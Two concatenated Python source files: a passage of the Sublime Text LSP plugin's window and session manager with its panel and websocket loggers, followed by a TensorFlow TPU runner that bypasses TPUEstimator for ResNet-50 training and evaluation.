if isinstance(region_or_point, int):
return self.diagnostics_touching_point_async(region_or_point)
elif region_or_point.empty():
return self.diagnostics_touching_point_async(region_or_point.a)
else:
return self.diagnostics_intersecting_region_async(region_or_point)
@abstractmethod
def diagnostics_panel_contribution_async(self) -> Sequence[Tuple[str, Optional[int], Optional[str], Optional[str]]]:
raise NotImplementedError()
@abstractmethod
def sum_total_errors_and_warnings_async(self) -> Tuple[int, int]:
raise NotImplementedError()
@abstractmethod
def on_diagnostics_updated_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def on_code_lens_capability_registered_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def get_resolved_code_lenses_for_region(self, region: sublime.Region) -> Iterable[CodeLens]:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
@abstractmethod
def get_language_id(self) -> str:
raise NotImplementedError()
@abstractmethod
def do_signature_help_async(self, manual: bool) -> None:
raise NotImplementedError()
@abstractmethod
def on_post_move_window_async(self) -> None:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self._panel_code_phantoms = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
sublime.set_timeout(functools.partial(self._update_panel_main_thread, None, _NO_DIAGNOSTICS_PLACEHOLDER, []))
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self.update_workspace_folders_async()
self._configs.update()
def on_post_save_project_async(self) -> None:
self.on_load_project_async()
def update_workspace_folders_async(self) -> None:
if self._workspace.update():
workspace_folders = self._workspace.get_workspace_folders()
for session in self._sessions:
session.update_folders(workspace_folders)
def enable_config_async(self, config_name: str) -> None:
enable_in_project(self._window, config_name)
# TODO: Why doesn't enable_in_project cause on_load_project_async to be called?
self._configs.update()
def disable_config_async(self, config_name: str) -> None:
disable_in_project(self._window, config_name)
# TODO: Why doesn't disable_in_project cause on_load_project_async to be called?
self._configs.update()
def _register_listener(self, listener: AbstractViewListener) -> None:
sublime.set_timeout_async(lambda: self.register_listener_async(listener))
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
        # Update the workspace folders in case the user has changed them since the window was created.
        # There is currently no notification in ST about folder changes.
self.update_workspace_folders_async()
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def unregister_listener_async(self, listener: AbstractViewListener) -> None:
self._listeners.discard(listener)
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
inside_workspace = self._workspace.contains(listener.view)
for session in self._sessions:
if session.can_handle(listener.view, None, inside_workspace):
# debug("registering session", session.config.name, "to listener", listener)
listener.on_session_initialized_async(session)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
inside_workspace = self._workspace.contains(view)
sessions = list(self._sessions)
for session in sessions:
if session.can_handle(view, capability, inside_workspace):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
inside = self._workspace.contains(file_path)
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path, inside):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name() or ''
inside = self._workspace.contains(view)
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name, inside):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
config = ClientConfig.from_config(config, {})
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
variables = extract_variables(self._window)
cwd = None # type: Optional[str]
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
cannot_start_reason = plugin_class.can_start(self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
message = "cannot start {}: {}".format(config.name, cannot_start_reason)
return self._window.status_message(message)
cwd = plugin_class.on_pre_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
if not cwd:
cwd = workspace_folders[0].path if workspace_folders else None
transport_config = config.resolve_transport_config(variables)
transport = create_transport(transport_config, cwd, session)
if plugin_class:
plugin_class.on_post_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "initialize")
session.initialize_async(
variables, transport,
lambda session, is_error: self._on_post_session_initialize(initiating_view, session, is_error))
self._new_session = session
except Exception as e:
message = "".join((
"Failed to start {0} - disabling for this window. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette.",
"\n\n--- Error: ---\n{1}"
)).format(config.name, str(e))
exception_log("Unable to start subprocess for {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_config(config.name)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
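    # Illustrative note (not from the original source): with a user setting such as
    # "log_server": ["panel", "remote"], the method above returns a RouterLogger that
    # fans out every log call to both a PanelLogger and a RemoteLogger; with an empty
    # list it returns a RouterLogger that logs nothing.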
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self._end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def _end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "".join((
"{0} exited with status code {1}. ",
"Do you want to restart it? If you choose Cancel, it will be disabled for this window. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette."
)).format(config.name, exit_code)
if exception:
msg += "\n\n--- Error: ---\n{}".format(str(exception))
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
for listener in self._listeners:
self.register_listener_async(listener)
else:
self._configs.disable_config(config.name)
def plugin_unloaded(self) -> None:
"""
        This is called **from the main thread** when the plugin unloads. In that case we must destroy all sessions
        from the main thread. That could lead to a dict or list being mutated while it is iterated over, so be careful.
"""
self._end_sessions_async()
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: update_server_panel(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
to_render = [] # type: List[str]
base_dir = None
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
prephantoms = [] # type: List[Tuple[int, int, str, str]]
row = 0
for listener in listeners:
local_errors, local_warnings = listener.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
contribution = listener.diagnostics_panel_contribution_async()
if not contribution:
continue
file_path = listener.view.file_name() or ""
base_dir = self.get_project_path(file_path) # What about different base dirs for multiple folders?
file_path = os.path.relpath(file_path, base_dir) if base_dir else file_path
to_render.append("{}:".format(file_path))
row += 1
for content, offset, code, href in contribution:
to_render.append(content)
if offset is not None and code is not None and href is not None:
prephantoms.append((row, offset, code, href))
row += content.count("\n") + 1
to_render.append("") # add spacing between filenames
row += 1
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
characters = "\n".join(to_render)
if not characters:
characters = _NO_DIAGNOSTICS_PLACEHOLDER
sublime.set_timeout(functools.partial(self._update_panel_main_thread, base_dir, characters, prephantoms))
def _update_panel_main_thread(self, base_dir: Optional[str], characters: str,
prephantoms: List[Tuple[int, int, str, str]]) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel or not panel.is_valid():
return
if isinstance(base_dir, str):
panel.settings().set("result_base_dir", base_dir)
else:
panel.settings().erase("result_base_dir")
panel.run_command("lsp_update_panel", {"characters": characters})
if self._panel_code_phantoms is None:
self._panel_code_phantoms = sublime.PhantomSet(panel, "hrefs")
phantoms = [] # type: List[sublime.Phantom]
for row, col, code, href in prephantoms:
point = panel.text_point(row, col)
region = sublime.Region(point, point)
phantoms.append(sublime.Phantom(region, make_link(href, code), sublime.LAYOUT_INLINE))
self._panel_code_phantoms.update(phantoms)
def show_diagnostics_panel_async(self) -> None:
if self._window.active_panel() is None:
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
wm = self._windows.get(window.id())
if wm:
return wm
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
w = view.window()
if not w:
return None
return self.lookup(w).listener_for_view(view)
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
        Not handled here, as stderr messages are handled by the WindowManager regardless
        of whether this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
|
train_and_eval_runner.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bypass TPUEstimator for ResNet-50 Train."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import operator
import os
import threading
import time
from absl import flags
import tensorflow.compat.v1 as tf
# copybara:strip_begin
from REDACTED import xprof_analysis_client as profiler_client
# copybara:strip_end
from REDACTED import rewriter_config_pb2
from REDACTED.tensorflow.python.tpu import device_assignment
from REDACTED.tensorflow.python.tpu import tpu
from REDACTED.tensorflow.python.tpu import tpu_feed
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.tpu import training_loop
from REDACTED.tensorflow.python.tpu.ops import tpu_ops
FLAGS = flags.FLAGS
_IS_PADDED = "is_padded"
flags.DEFINE_string(
"master",
default=None,
help="The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.")
flags.DEFINE_string(
"gcp_project",
default=None,
help="Project name for the Cloud TPU-enabled project. If not specified, we "
"will attempt to automatically detect the GCE project from metadata.")
flags.DEFINE_string(
"tpu_zone",
default=None,
help="GCE zone where the Cloud TPU is located in. If not specified, we "
"will attempt to automatically detect the GCE project from metadata.")
flags.DEFINE_integer(
"replicas_per_host", default=8, help=("Number of replicas per host."))
flags.DEFINE_bool("enable_summary", default=False, help=("Enable summary"))
flags.DEFINE_string(
"model_dir",
default=None,
help=("The directory where the model and summaries are stored."))
flags.DEFINE_bool("save_checkpoint", default=False, help=("Save checkpoint"))
flags.DEFINE_bool(
"restore_checkpoint", default=False, help=("Restore checkpoint"))
flags.DEFINE_integer(
"sleep_after_init", default=60, help=("Sleep for N seconds after init."))
flags.DEFINE_bool(
"enable_mlir_bridge", default=False, help=("Enable TF/XLA MLIR bridge"))
flags.DEFINE_bool(
"enable_profiling",
default=False,
help=("Get xprof traces at"
"the start and middle of the train loops"))
_NUM_CORES_TO_COMPUTATION_SHAPE = {
1: [1, 1, 1, 1],
2: [1, 1, 1, 2],
4: [1, 2, 1, 2],
8: [2, 2, 1, 2],
16: [4, 2, 1, 2],
}
def _profiler_callback(comment, session_id):
if session_id is None:
tf.logging.info("Profiling failed for %s", comment)
else:
tf.logging.info("Profiling succeeded for %s. Overview page url:", comment)
# copybara:strip_begin
tf.logging.info(
"https://REDACTED/overview_page.html?session_id=%s" %
session_id)
# copybara:strip_end
# Decorator function for tpu computation func that was passed to tpu.rewrite()
# if there are embedded train and eval loops in this func, trace tools will
# generate step markers for each iteration.
def on_device_train_and_eval_loops(func):
# Value for this attribute is from xla.DebugOptions.StepMarkerLocation.
setattr(func, "step_marker_location", "STEP_MARK_AT_SECOND_LEVEL_WHILE_LOOP")
return func
def device_for_tpu_core(host_name, core=0):
return host_name + "/device:TPU_REPLICATED_CORE:%d" % core
def device_for_host(host_name):
return host_name + "/device:CPU:0"
class TrainAndEvalRunner(object):
"""Remove init overheads in TPU Estimator via direct session.run calls."""
def __init__(self,
iterations_per_loop,
train_steps,
eval_steps,
num_replicas,
eval_dataset_repeats=True,
do_initialize=True):
self.feature_structure = {}
self.infeed_op = {}
self.num_replicas = num_replicas
self.eval_dataset_repeats = eval_dataset_repeats
# Set number of input graphs to number of hosts up to a maximum of 32.
self.num_input_graphs = min(32,
self.num_replicas // FLAGS.replicas_per_host)
    # The following data have separate copies for training and eval, and are
    # therefore represented as maps from is_train (boolean) to the actual data.
self.dataset_initializer = {True: [], False: []}
self.input_graph = {True: [], False: []}
self.input_sess = {True: [], False: []}
self.enqueue_ops = {True: [], False: []}
for _ in range(self.num_input_graphs):
self.input_graph[True].append(tf.Graph())
self.input_graph[False].append(tf.Graph())
self.dataset_initializer[True].append([])
self.dataset_initializer[False].append([])
self.enqueue_ops[True].append([])
self.enqueue_ops[False].append([])
self.input_sess[True].append([])
self.input_sess[False].append([])
# dequeue_ops is only for eval
self.dequeue_ops = []
self.iterations_per_loop = iterations_per_loop
self.sess = None
self.output_sess = None
self.train_eval_thread = None
self.graph = tf.Graph()
if iterations_per_loop != 0 and train_steps % iterations_per_loop != 0:
train_steps = iterations_per_loop * int(
math.ceil(train_steps / iterations_per_loop))
self.train_steps = train_steps
if iterations_per_loop == 0:
self.max_train_iterations = 1
else:
self.max_train_iterations = train_steps // iterations_per_loop
self.eval_steps = int(eval_steps)
self.train_batch_size = 0
self.eval_batch_size = 0
self.eval_has_labels = 0
self.model_fn = None
self.num_outfeeds = self.eval_steps
self.config = tf.ConfigProto(
operation_timeout_in_ms=600 * 60 * 1000,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
if FLAGS.enable_mlir_bridge:
self.config.experimental.enable_mlir_bridge = True
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.master,
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project,
job_name="tpu_worker")
self.master = tpu_cluster_resolver.get_master()
self.job_name = tpu_cluster_resolver.get_job_name() or "tpu_worker"
self.embedding_config = None
self.device_topology = None
if do_initialize:
self.device_topology = tf.Session(
self.master, config=self.config).run(tpu.initialize_system())
def maybe_capture_embedding_inputs(self, inputs, is_training):
pass
def maybe_add_embedding_enqueue_ops_int(self, is_training, enqueue_ops):
pass
def maybe_get_embedding_train_op(self):
return tf.no_op()
def maybe_add_embedding_features(self, features, hook_dummy_variables):
pass
def maybe_load_embedding_vars(self):
pass
def get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
return "/job:%s/task:%d" % (self.job_name, host_id)
def build_enqueue_ops(self, input_fn, is_training, input_partition_dims,
params):
"""Build enqueue operations for the input pipeline in a given host.
Args:
input_fn: dataset input graph generation function
is_training: boolean indicates if it is training
input_partition_dims: list of integers to partition input
params: hyper parameters
"""
def _tpu_ordinal_fn(shard_index_in_host):
replica_id = self.device_assignment.lookup_replicas(
host_id, logical_core=0)[shard_index_in_host]
return self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
host_id = params["dataset_index"]
gindex = host_id % self.num_input_graphs
with self.input_graph[is_training][gindex].as_default():
with tf.device(device_for_host(self.get_host(host_id))):
dataset = input_fn(params)
if not is_training and self.eval_dataset_repeats:
dataset = dataset.cache().repeat()
iterator = dataset.make_initializable_iterator()
self.dataset_initializer[is_training][gindex].append(
iterator.initializer)
def enqueue_ops_fn(idx):
"""Generate the infeed enqueue ops graph."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(FLAGS.replicas_per_host):
with tf.control_dependencies(control_deps):
self.feature_structure[is_training] = iterator.get_next()
self.maybe_capture_embedding_inputs(
self.feature_structure[is_training], is_training)
flattened_inputs = tf.nest.flatten(
self.feature_structure[is_training])
control_deps.extend(flattened_inputs)
if input_partition_dims:
padded_inputs = []
for inp in flattened_inputs:
if inp.shape.ndims < len(input_partition_dims):
padded_inputs.append(inp)
continue
paddings = []
for i, j in enumerate(input_partition_dims):
r = inp.shape.as_list()[i] % j
if r > 0:
paddings.append([0, j - r])
else:
paddings.append([0, 0])
for i in range(inp.shape.ndims - len(input_partition_dims)):
paddings.append([0, 0])
padded_inputs.append(tf.pad(inp, paddings))
per_host_sharded_inputs.append(padded_inputs)
else:
per_host_sharded_inputs.append(flattened_inputs)
if input_partition_dims:
flattened_input_dims = []
for i in per_host_sharded_inputs[0]:
if i.shape.ndims == len(input_partition_dims):
flattened_input_dims.append(input_partition_dims)
elif i.shape.ndims > len(input_partition_dims):
flattened_input_dims.append(
input_partition_dims + [1] *
(i.shape.ndims - len(input_partition_dims)))
else:
flattened_input_dims.append([1] * i.shape.ndims)
# pylint: disable=protected-access
self.infeed_op[is_training] = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
with tf.control_dependencies(
self.infeed_op[is_training].generate_enqueue_ops(
per_host_sharded_inputs)):
return idx + 1
else:
self.infeed_op[is_training] = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = (
self.infeed_op[is_training].generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=_tpu_ordinal_fn))
self.maybe_add_embedding_enqueue_ops_int(
is_training, per_host_enqueue_ops)
with tf.control_dependencies(per_host_enqueue_ops):
return idx + 1
iterations = self.iterations_per_loop if is_training else self.eval_steps
self.enqueue_ops[is_training][gindex].append(
tf.while_loop(
lambda i: tf.less(i, iterations),
enqueue_ops_fn, [tf.constant(0)],
parallel_iterations=1))
def launch_profiler(self):
"""Launches a profiling session to collect a trace from worker-0."""
# copybara:strip_begin
profiler = profiler_client.XprofAnalysisClient()
result = profiler.collect(
hosts=[FLAGS.master],
duration_ms=5000,
callback=functools.partial(_profiler_callback, "1st session"))
# copybara:strip_end
if result == profiler_client.PROFILED_IN_NEW_THREAD:
tf.logging.info("A profiler session launched in a new thread.")
else:
tf.logging.info("profiler.collect() failed.")
def eval_step(self):
"""One evaluation step."""
inp = self.infeed_op[False].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[False])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
if self.eval_has_labels:
features, labels = tf.nest.pack_sequence_as(self.feature_structure[False],
inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[False], inp)
labels = None
self.maybe_add_embedding_features(features, False)
_, self.predict_output = self.model_fn(features, labels, False)
for _ in self.predict_output:
self.dequeue_ops.append([])
with tf.device(device_for_tpu_core(self.get_host(0))):
return [
tpu_ops.outfeed_enqueue_tuple(tf.nest.flatten(self.predict_output))
]
@tpu_function.on_device_training_loop
def eval_loop(self):
tf.get_variable_scope().reuse_variables()
return training_loop.repeat(int(self.eval_steps), self.eval_step)
